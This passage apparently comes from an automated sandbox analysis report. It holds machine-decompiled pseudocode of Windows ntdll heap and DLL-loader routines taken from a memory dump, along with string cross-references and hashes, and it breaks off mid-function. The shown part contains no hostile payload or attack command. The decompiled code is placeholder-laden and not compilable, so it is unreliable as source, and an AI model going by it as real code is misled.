                                                                                          									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
                                                                                          									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
                                                                                          									goto L17;
                                                                                          								}
                                                                                          								_t252 = _t187;
                                                                                          								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
                                                                                          									continue;
                                                                                          								}
                                                                                          								goto L15;
                                                                                          							}
                                                                                          							while(1) {
                                                                                          								L17:
                                                                                          								_t212 = E01B5AB40(_t206, _t252, 1, _t185, _t211);
                                                                                          								if(_t212 != 0) {
                                                                                          									_t146 = _t206 + 0xc0;
                                                                                          									break;
                                                                                          								}
                                                                                          								_t252 =  *_t252;
                                                                                          								_t211 = _v20;
                                                                                          								_t185 =  *(_t252 + 0x14);
                                                                                          							}
                                                                                          							L19:
                                                                                          							if(_t146 != _t212) {
                                                                                          								_t237 =  *(_t206 + 0x4c);
                                                                                          								_t253 = _v20;
                                                                                          								while(1) {
                                                                                          									__eflags = _t237;
                                                                                          									if(_t237 == 0) {
                                                                                          										_t147 =  *(_t212 - 8) & 0x0000ffff;
                                                                                          									} else {
                                                                                          										_t184 =  *(_t212 - 8);
                                                                                          										_t237 =  *(_t206 + 0x4c);
                                                                                          										__eflags = _t184 & _t237;
                                                                                          										if((_t184 & _t237) != 0) {
                                                                                          											_t184 = _t184 ^  *(_t206 + 0x50);
                                                                                          											__eflags = _t184;
                                                                                          										}
                                                                                          										_t147 = _t184 & 0x0000ffff;
                                                                                          									}
                                                                                          									__eflags = _t253 - (_t147 & 0x0000ffff);
                                                                                          									if(_t253 <= (_t147 & 0x0000ffff)) {
                                                                                          										goto L20;
                                                                                          									}
                                                                                          									_t212 =  *_t212;
                                                                                          									__eflags = _t206 + 0xc0 - _t212;
                                                                                          									if(_t206 + 0xc0 != _t212) {
                                                                                          										continue;
                                                                                          									} else {
                                                                                          										goto L20;
                                                                                          									}
                                                                                          									goto L56;
                                                                                          								}
                                                                                          							}
                                                                                          							L20:
                                                                                          							_t149 =  *((intOrPtr*)(_t212 + 4));
                                                                                          							_t33 = _t256 + 8; // -16
                                                                                          							_t238 = _t33;
                                                                                          							_t254 =  *_t149;
                                                                                          							if( *_t149 != _t212) {
                                                                                          								_push(_t212);
                                                                                          								E01BFA80D(0, _t212, 0, _t254);
                                                                                          							} else {
                                                                                          								 *_t238 = _t212;
                                                                                          								 *((intOrPtr*)(_t238 + 4)) = _t149;
                                                                                          								 *_t149 = _t238;
                                                                                          								 *((intOrPtr*)(_t212 + 4)) = _t238;
                                                                                          							}
                                                                                          							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
                                                                                          							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
                                                                                          							if(_t255 == 0) {
                                                                                          								L36:
                                                                                          								if( *(_t206 + 0x4c) != 0) {
                                                                                          									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
                                                                                          									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
                                                                                          								}
                                                                                          								_t210 = _v48;
                                                                                          								_t251 = _v12 & 0x0000ffff;
                                                                                          								_t131 = _v20;
                                                                                          								_t235 = _v24 - _t131;
                                                                                          								_v24 = _t235;
                                                                                          								_t256 = _t256 + _t131 * 8;
                                                                                          								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
                                                                                          									goto L41;
                                                                                          								} else {
                                                                                          									goto L39;
                                                                                          								}
                                                                                          							} else {
                                                                                          								_t216 =  *_t256 & 0x0000ffff;
                                                                                          								_v28 = _t216;
                                                                                          								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
                                                                                          									L28:
                                                                                          									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
                                                                                          									_v32 = _t242;
                                                                                          									if( *((intOrPtr*)(_t255 + 8)) != 0) {
                                                                                          										_t167 = _t242 + _t242;
                                                                                          									} else {
                                                                                          										_t167 = _t242;
                                                                                          									}
                                                                                          									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
                                                                                          									_t168 = _t167 << 2;
                                                                                          									_v40 = _t168;
                                                                                          									_t206 = _v44;
                                                                                          									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
                                                                                          									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
                                                                                          										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
                                                                                          									}
                                                                                          									_t217 = _v16;
                                                                                          									if(_t217 != 0) {
                                                                                          										_t173 = _t217 - 8;
                                                                                          										_v52 = _t173;
                                                                                          										_t174 =  *_t173;
                                                                                          										__eflags =  *(_t206 + 0x4c);
                                                                                          										if( *(_t206 + 0x4c) != 0) {
                                                                                          											_t245 =  *(_t206 + 0x50) ^ _t174;
                                                                                          											_v36 = _t245;
                                                                                          											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
                                                                                          											__eflags = _t245 >> 0x18 - _t225;
                                                                                          											if(_t245 >> 0x18 != _t225) {
                                                                                          												_push(_t225);
                                                                                          												E01BFA80D(_t206, _v52, 0, 0);
                                                                                          											}
                                                                                          											_t174 = _v36;
                                                                                          											_t217 = _v16;
                                                                                          											_t242 = _v32;
                                                                                          										}
                                                                                          										_v28 = _v28 - (_t174 & 0x0000ffff);
                                                                                          										__eflags = _v28;
                                                                                          										if(_v28 > 0) {
                                                                                          											goto L34;
                                                                                          										} else {
                                                                                          											goto L33;
                                                                                          										}
                                                                                          									} else {
                                                                                          										L33:
                                                                                          										_t58 = _t256 + 8; // -16
                                                                                          										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
                                                                                          										_t206 = _v44;
                                                                                          										_t217 = _v16;
                                                                                          										L34:
                                                                                          										if(_t217 == 0) {
                                                                                          											asm("bts eax, edx");
                                                                                          										}
                                                                                          										goto L36;
                                                                                          									}
                                                                                          								} else {
                                                                                          									goto L24;
                                                                                          								}
                                                                                          								while(1) {
                                                                                          									L24:
                                                                                          									_t182 =  *_t255;
                                                                                          									if(_t182 == 0) {
                                                                                          										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
                                                                                          										__eflags = _t216;
                                                                                          										goto L28;
                                                                                          									}
                                                                                          									_t255 = _t182;
                                                                                          									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
                                                                                          										continue;
                                                                                          									} else {
                                                                                          										goto L28;
                                                                                          									}
                                                                                          								}
                                                                                          								goto L28;
                                                                                          							}
                                                                                          						}
                                                                                          					}
                                                                                          					L39:
                                                                                          				} while (_t235 != 0);
                                                                                          				_t214 = _v12;
                                                                                          				_t131 =  *(_t206 + 0x54) ^ _t214;
                                                                                          				 *(_t256 + 4) = _t131;
                                                                                          				if(_t214 == 0) {
                                                                                          					__eflags =  *0x1c28748 - 1;
                                                                                          					if( *0x1c28748 >= 1) {
                                                                                          						_t127 = _t256 + 0xfff; // 0xfff
                                                                                          						_t131 = _t127 & 0xfffff000;
                                                                                          						__eflags = _t131 - _t256;
                                                                                          						if(_t131 != _t256) {
                                                                                          							_t156 =  *[fs:0x30];
                                                                                          							__eflags =  *(_t156 + 0xc);
                                                                                          							if( *(_t156 + 0xc) == 0) {
                                                                                          								_push("HEAP: ");
                                                                                          								E01B3B150();
                                                                                          							} else {
                                                                                          								E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                          							}
                                                                                          							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
                                                                                          							_t131 = E01B3B150();
                                                                                          							__eflags =  *0x1c27bc8;
                                                                                          							if(__eflags == 0) {
                                                                                          								_t131 = E01BF2073(_t206, 1, _t251, __eflags);
                                                                                          							}
                                                                                          						}
                                                                                          					}
                                                                                          				}
                                                                                          				goto L41;
                                                                                          			}























































                                                                                          0x00000000
                                                                                          0x01b5a9eb
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01b5a983
                                                                                          0x01b5a983
                                                                                          0x01b5a983
                                                                                          0x01b5a987
                                                                                          0x01b5a995
                                                                                          0x01b5a995
                                                                                          0x01b5a995
                                                                                          0x01b5a995
                                                                                          0x01b5a989
                                                                                          0x01b5a98e
                                                                                          0x00000000
                                                                                          0x01b5a990
                                                                                          0x00000000
                                                                                          0x01b5a990
                                                                                          0x01b5a98e
                                                                                          0x00000000
                                                                                          0x01b5a983
                                                                                          0x01b5a972
                                                                                          0x01b5a90a
                                                                                          0x01b5aa34
                                                                                          0x01b5aa34
                                                                                          0x01b5aa40
                                                                                          0x01b5aa43
                                                                                          0x01b5aa46
                                                                                          0x01b5aa4d
                                                                                          0x01ba23ab
                                                                                          0x01ba23b2
                                                                                          0x01ba23b8
                                                                                          0x01ba23be
                                                                                          0x01ba23c3
                                                                                          0x01ba23c5
                                                                                          0x01ba23cb
                                                                                          0x01ba23d1
                                                                                          0x01ba23d5
                                                                                          0x01ba23f6
                                                                                          0x01ba23fb
                                                                                          0x01ba23d7
                                                                                          0x01ba23ec
                                                                                          0x01ba23f1
                                                                                          0x01ba2403
                                                                                          0x01ba2408
                                                                                          0x01ba2410
                                                                                          0x01ba2417
                                                                                          0x01ba2422
                                                                                          0x01ba2422
                                                                                          0x01ba2417
                                                                                          0x01ba23c5
                                                                                          0x01ba23b2
                                                                                          0x00000000

                                                                                          Strings
                                                                                          • HEAP[%wZ]: , xrefs: 01BA22D7, 01BA23E7
                                                                                          • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01BA2403
                                                                                          • HEAP: , xrefs: 01BA22E6, 01BA23F6
                                                                                          • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 01BA22F3
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                          • API String ID: 0-1657114761
                                                                                          • Opcode ID: 5a0d90f42004cea2fbe76cbe0a65ae7d58cc9697dfbeab4bb82d577c4eace3cd
                                                                                          • Instruction ID: c46e4bd5be7dc5ac15ddd36f2ad8c277d887be6dccf97cade61e90f9a5bb3c00
                                                                                          • Opcode Fuzzy Hash: 5a0d90f42004cea2fbe76cbe0a65ae7d58cc9697dfbeab4bb82d577c4eace3cd
                                                                                          • Instruction Fuzzy Hash: F6D1BE34A046468FDB5DCF68C590BBABBF1FF48300F1586E9D95AAB346E330A945CB50
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 69%
                                                                                          			E01B5A229(void* __ecx, void* __edx) {
                                                                                          				signed int _v20;
                                                                                          				char _v24;
                                                                                          				char _v28;
                                                                                          				void* _v44;
                                                                                          				void* _v48;
                                                                                          				void* _v56;
                                                                                          				void* _v60;
                                                                                          				void* __ebx;
                                                                                          				signed int _t55;
                                                                                          				signed int _t57;
                                                                                          				void* _t61;
                                                                                          				intOrPtr _t62;
                                                                                          				void* _t65;
                                                                                          				void* _t71;
                                                                                          				signed char* _t74;
                                                                                          				intOrPtr _t75;
                                                                                          				signed char* _t80;
                                                                                          				intOrPtr _t81;
                                                                                          				void* _t82;
                                                                                          				signed char* _t85;
                                                                                          				signed char _t91;
                                                                                          				void* _t103;
                                                                                          				void* _t105;
                                                                                          				void* _t121;
                                                                                          				void* _t129;
                                                                                          				signed int _t131;
                                                                                          				void* _t133;
                                                                                          
                                                                                          				_t105 = __ecx;
                                                                                          				_t133 = (_t131 & 0xfffffff8) - 0x1c;
                                                                                          				_t103 = __edx;
                                                                                          				_t129 = __ecx;
                                                                                          				E01B5DF24(__edx,  &_v28, _t133);
                                                                                          				_t55 =  *(_t129 + 0x40) & 0x00040000;
                                                                                          				asm("sbb edi, edi");
                                                                                          				_t121 = ( ~_t55 & 0x0000003c) + 4;
                                                                                          				if(_t55 != 0) {
                                                                                          					_push(0);
                                                                                          					_push(0x14);
                                                                                          					_push( &_v24);
                                                                                          					_push(3);
                                                                                          					_push(_t129);
                                                                                          					_push(0xffffffff);
                                                                                          					_t57 = E01B79730();
                                                                                          					__eflags = _t57;
                                                                                          					if(_t57 < 0) {
                                                                                          						L17:
                                                                                          						_push(_t105);
                                                                                          						E01BFA80D(_t129, 1, _v20, 0);
                                                                                          						_t121 = 4;
                                                                                          						goto L1;
                                                                                          					}
                                                                                          					__eflags = _v20 & 0x00000060;
                                                                                          					if((_v20 & 0x00000060) == 0) {
                                                                                          						goto L17;
                                                                                          					}
                                                                                          					__eflags = _v24 - _t129;
                                                                                          					if(_v24 == _t129) {
                                                                                          						goto L1;
                                                                                          					}
                                                                                          					goto L17;
                                                                                          				}
                                                                                          				L1:
                                                                                          				_push(_t121);
                                                                                          				_push(0x1000);
                                                                                          				_push(_t133 + 0x14);
                                                                                          				_push(0);
                                                                                          				_push(_t133 + 0x20);
                                                                                          				_push(0xffffffff);
                                                                                          				_t61 = E01B79660();
                                                                                          				_t122 = _t61;
                                                                                          				if(_t61 < 0) {
                                                                                          					_t62 =  *[fs:0x30];
                                                                                          					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
                                                                                          					__eflags =  *(_t62 + 0xc);
                                                                                          					if( *(_t62 + 0xc) == 0) {
                                                                                          						_push("HEAP: ");
                                                                                          						E01B3B150();
                                                                                          					} else {
                                                                                          						E01B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                          					}
                                                                                          					_push( *((intOrPtr*)(_t133 + 0xc)));
                                                                                          					_push( *((intOrPtr*)(_t133 + 0x14)));
                                                                                          					_push(_t129);
                                                                                          					E01B3B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
                                                                                          					_t65 = 0;
                                                                                          					L13:
                                                                                          					return _t65;
                                                                                          				}
                                                                                          				_t71 = E01B57D50();
                                                                                          				_t124 = 0x7ffe0380;
                                                                                          				if(_t71 != 0) {
                                                                                          					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                          				} else {
                                                                                          					_t74 = 0x7ffe0380;
                                                                                          				}
                                                                                          				if( *_t74 != 0) {
                                                                                          					_t75 =  *[fs:0x30];
                                                                                          					__eflags =  *(_t75 + 0x240) & 0x00000001;
                                                                                          					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
                                                                                          						E01BF138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
                                                                                          					}
                                                                                          				}
                                                                                          				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
                                                                                          				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
                                                                                          				if(E01B57D50() != 0) {
                                                                                          					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                          				} else {
                                                                                          					_t80 = _t124;
                                                                                          				}
                                                                                          				if( *_t80 != 0) {
                                                                                          					_t81 =  *[fs:0x30];
                                                                                          					__eflags =  *(_t81 + 0x240) & 0x00000001;
                                                                                          					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
                                                                                          						__eflags = E01B57D50();
                                                                                          						if(__eflags != 0) {
                                                                                          							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                          							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                          						}
                                                                                          						E01BF1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
                                                                                          					}
                                                                                          				}
                                                                                          				_t82 = E01B57D50();
                                                                                          				_t125 = 0x7ffe038a;
                                                                                          				if(_t82 != 0) {
                                                                                          					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                          				} else {
                                                                                          					_t85 = 0x7ffe038a;
                                                                                          				}
                                                                                          				if( *_t85 != 0) {
                                                                                          					__eflags = E01B57D50();
                                                                                          					if(__eflags != 0) {
                                                                                          						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                          						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                          					}
                                                                                          					E01BF1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
                                                                                          				}
                                                                                          				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
                                                                                          				_t91 =  *(_t103 + 2);
                                                                                          				if((_t91 & 0x00000004) != 0) {
                                                                                          					E01B8D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
                                                                                          					_t91 =  *(_t103 + 2);
                                                                                          				}
                                                                                          				 *(_t103 + 2) = _t91 & 0x00000017;
                                                                                          				_t65 = 1;
                                                                                          				goto L13;
                                                                                          			}
                                                                                          0x01ba1cc1
                                                                                          0x01b5a29a
                                                                                          0x01b5a29a
                                                                                          0x01b5a29a
                                                                                          0x01b5a29f
                                                                                          0x01ba1ccb
                                                                                          0x01ba1cd1
                                                                                          0x01ba1cd8
                                                                                          0x01ba1cea
                                                                                          0x01ba1cea
                                                                                          0x01ba1cd8
                                                                                          0x01b5a2a9
                                                                                          0x01b5a2af
                                                                                          0x01b5a2bc
                                                                                          0x01ba1cfd
                                                                                          0x01b5a2c2
                                                                                          0x01b5a2c2
                                                                                          0x01b5a2c2
                                                                                          0x01b5a2c7
                                                                                          0x01ba1d07
                                                                                          0x01ba1d0d
                                                                                          0x01ba1d14
                                                                                          0x01ba1d1f
                                                                                          0x01ba1d21
                                                                                          0x01ba1d2c
                                                                                          0x01ba1d2c
                                                                                          0x01ba1d2c
                                                                                          0x01ba1d47
                                                                                          0x01ba1d47
                                                                                          0x01ba1d14
                                                                                          0x01b5a2cd
                                                                                          0x01b5a2d2
                                                                                          0x01b5a2d9
                                                                                          0x01ba1d5a
                                                                                          0x01b5a2df
                                                                                          0x01b5a2df
                                                                                          0x01b5a2df
                                                                                          0x01b5a2e4
                                                                                          0x01ba1d69
                                                                                          0x01ba1d6b
                                                                                          0x01ba1d76
                                                                                          0x01ba1d76
                                                                                          0x01ba1d76
                                                                                          0x01ba1d91
                                                                                          0x01ba1d91
                                                                                          0x01b5a2ea
                                                                                          0x01b5a2f0
                                                                                          0x01b5a2f5
                                                                                          0x01ba1da8
                                                                                          0x01ba1dad
                                                                                          0x01ba1dad
                                                                                          0x01b5a2fd
                                                                                          0x01b5a300
                                                                                          0x00000000

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                          • API String ID: 2994545307-2586055223
                                                                                          • Opcode ID: 74032e3d8faee44ac840f53fb50a40581a332bf039fe7d3b26bf1b4cd476ac91
                                                                                          • Instruction ID: 9ce2121cf3155b93785a81f11c632ec786e428e63d71aac2ca8b0c82ed2d0ed0
                                                                                          • Opcode Fuzzy Hash: 74032e3d8faee44ac840f53fb50a40581a332bf039fe7d3b26bf1b4cd476ac91
                                                                                          • Instruction Fuzzy Hash: DC5117322086819FD76AEB6CC845F677BE8FF80B50F0806E8F9959B291DB75D804C761
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 44%
                                                                                          			E01B68E00(void* __ecx) {
                                                                                          				signed int _v8;
                                                                                          				char _v12;
                                                                                          				void* __ebx;
                                                                                          				void* __edi;
                                                                                          				void* __esi;
                                                                                          				intOrPtr* _t32;
                                                                                          				intOrPtr _t35;
                                                                                          				intOrPtr _t43;
                                                                                          				void* _t46;
                                                                                          				intOrPtr _t47;
                                                                                          				void* _t48;
                                                                                          				signed int _t49;
                                                                                          				void* _t50;
                                                                                          				intOrPtr* _t51;
                                                                                          				signed int _t52;
                                                                                          				void* _t53;
                                                                                          				intOrPtr _t55;
                                                                                          
                                                                                          				_v8 =  *0x1c2d360 ^ _t52;
                                                                                          				_t49 = 0;
                                                                                          				_t48 = __ecx;
                                                                                          				_t55 =  *0x1c28464; // 0x73b80110
                                                                                          				if(_t55 == 0) {
                                                                                          					L9:
                                                                                          					if( !_t49 >= 0) {
                                                                                          						if(( *0x1c25780 & 0x00000003) != 0) {
                                                                                          							E01BB5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                                                          						}
                                                                                          						if(( *0x1c25780 & 0x00000010) != 0) {
                                                                                          							asm("int3");
                                                                                          						}
                                                                                          					}
                                                                                          					return E01B7B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                                                          				}
                                                                                          				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                                                          				_t43 =  *0x1c27984; // 0x16d2b78
                                                                                          				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                                                          					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                                                          					if(_t48 == _t43) {
                                                                                          						_t50 = 0x5c;
                                                                                          						if( *_t32 == _t50) {
                                                                                          							_t46 = 0x3f;
                                                                                          							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                                                          								_t32 = _t32 + 8;
                                                                                          							}
                                                                                          						}
                                                                                          					}
                                                                                          					_t51 =  *0x1c28464; // 0x73b80110
                                                                                          					 *0x1c2b1e0(_t47, _t32,  &_v12);
                                                                                          					_t49 =  *_t51();
                                                                                          					if(_t49 >= 0) {
                                                                                          						L8:
                                                                                          						_t35 = _v12;
                                                                                          						if(_t35 != 0) {
                                                                                          							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                                                          								E01B69B10( *((intOrPtr*)(_t48 + 0x48)));
                                                                                          								_t35 = _v12;
                                                                                          							}
                                                                                          							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                                                          						}
                                                                                          						goto L9;
                                                                                          					}
                                                                                          					if(_t49 != 0xc000008a) {
                                                                                          						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                                                          							if(_t49 != 0xc00000bb) {
                                                                                          								goto L8;
                                                                                          							}
                                                                                          						}
                                                                                          					}
                                                                                          					if(( *0x1c25780 & 0x00000005) != 0) {
                                                                                          						_push(_t49);
                                                                                          						E01BB5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                                                          						_t53 = _t53 + 0x1c;
                                                                                          					}
                                                                                          					_t49 = 0;
                                                                                          					goto L8;
                                                                                          				} else {
                                                                                          					goto L9;
                                                                                          				}
                                                                                          			}





















                                                                                          Strings
                                                                                          • LdrpFindDllActivationContext, xrefs: 01BA9331, 01BA935D
                                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 01BA933B, 01BA9367
                                                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 01BA9357
                                                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 01BA932A
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                          • API String ID: 0-3779518884
                                                                                          • Opcode ID: 56b0e1241928775a2eebd57c78d96c0d56d04eb2720de675f5dd9b0c81c9a24f
                                                                                          • Instruction ID: 8ead80f6d07a3444b39ff5d97bdee54e032ade6d3fd58d29426095d66a2e0821
                                                                                          • Opcode Fuzzy Hash: 56b0e1241928775a2eebd57c78d96c0d56d04eb2720de675f5dd9b0c81c9a24f
                                                                                          • Instruction Fuzzy Hash: 4941F732A403159FDF3EAB1CCC89B76B6BCEB30654F4642E9E90957151E7B89D80C381
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                          • API String ID: 2994545307-336120773
                                                                                          • Opcode ID: 5770b587061c205414409059f300e8d321f808a069ea1ec96e9cf3b25dbecbcb
                                                                                          • Instruction ID: e6ccccb26cd284aaf7ce944c454adc347ce12cbce59c3af9d6a9034b34379f09
                                                                                          • Opcode Fuzzy Hash: 5770b587061c205414409059f300e8d321f808a069ea1ec96e9cf3b25dbecbcb
                                                                                          • Instruction Fuzzy Hash: ED310336210514EFD728DB6EC985F6B77A8EF04720F1541DEF6058B251E770A84CCB58
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 78%
                                                                                          			E01B599BF(void* __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
                                                                                          				char _v5;
                                                                                          				signed int _v12;
                                                                                          				signed int _v16;
                                                                                          				signed short _v20;
                                                                                          				void* __ebx;
                                                                                          				void* __edi;
                                                                                          				void* __esi;
                                                                                          				void* __ebp;
                                                                                          				signed short _t186;
                                                                                          				intOrPtr _t187;
                                                                                          				signed short _t190;
                                                                                          				signed int _t196;
                                                                                          				signed short _t197;
                                                                                          				intOrPtr _t203;
                                                                                          				signed int _t207;
                                                                                          				signed int _t210;
                                                                                          				signed short _t215;
                                                                                          				intOrPtr _t216;
                                                                                          				signed short _t219;
                                                                                          				signed int _t221;
                                                                                          				signed short _t222;
                                                                                          				intOrPtr _t228;
                                                                                          				signed int _t232;
                                                                                          				signed int _t235;
                                                                                          				signed int _t250;
                                                                                          				signed short _t251;
                                                                                          				intOrPtr _t252;
                                                                                          				signed short _t254;
                                                                                          				intOrPtr _t255;
                                                                                          				signed int _t258;
                                                                                          				signed int _t259;
                                                                                          				signed short _t262;
                                                                                          				intOrPtr _t271;
                                                                                          				signed int _t279;
                                                                                          				signed int _t282;
                                                                                          				signed int _t284;
                                                                                          				signed int _t286;
                                                                                          				intOrPtr _t292;
                                                                                          				signed int _t296;
                                                                                          				signed int _t299;
                                                                                          				void* _t307;
                                                                                          				signed int* _t309;
                                                                                          				signed short* _t311;
                                                                                          				signed short* _t313;
                                                                                          				signed char _t314;
                                                                                          				intOrPtr _t316;
                                                                                          				signed int _t323;
                                                                                          				signed char _t328;
                                                                                          				signed short* _t330;
                                                                                          				signed char _t331;
                                                                                          				intOrPtr _t335;
                                                                                          				signed int _t342;
                                                                                          				signed char _t347;
                                                                                          				signed short* _t348;
                                                                                          				signed short* _t350;
                                                                                          				signed short _t352;
                                                                                          				signed char _t354;
                                                                                          				intOrPtr _t357;
                                                                                          				intOrPtr* _t364;
                                                                                          				signed char _t365;
                                                                                          				intOrPtr _t366;
                                                                                          				signed int _t373;
                                                                                          				signed char _t378;
                                                                                          				signed int* _t381;
                                                                                          				signed int _t382;
                                                                                          				signed short _t384;
                                                                                          				signed int _t386;
                                                                                          				unsigned int _t390;
                                                                                          				signed int _t393;
                                                                                          				signed int* _t394;
                                                                                          				unsigned int _t398;
                                                                                          				signed short _t400;
                                                                                          				signed short _t402;
                                                                                          				signed int _t404;
                                                                                          				signed int _t407;
                                                                                          				unsigned int _t411;
                                                                                          				signed short* _t414;
                                                                                          				signed int _t415;
                                                                                          				signed short* _t419;
                                                                                          				signed int* _t420;
                                                                                          				void* _t421;
                                                                                          
                                                                                          				_t414 = __edx;
                                                                                          				_t307 = __ecx;
                                                                                          				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
                                                                                          				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
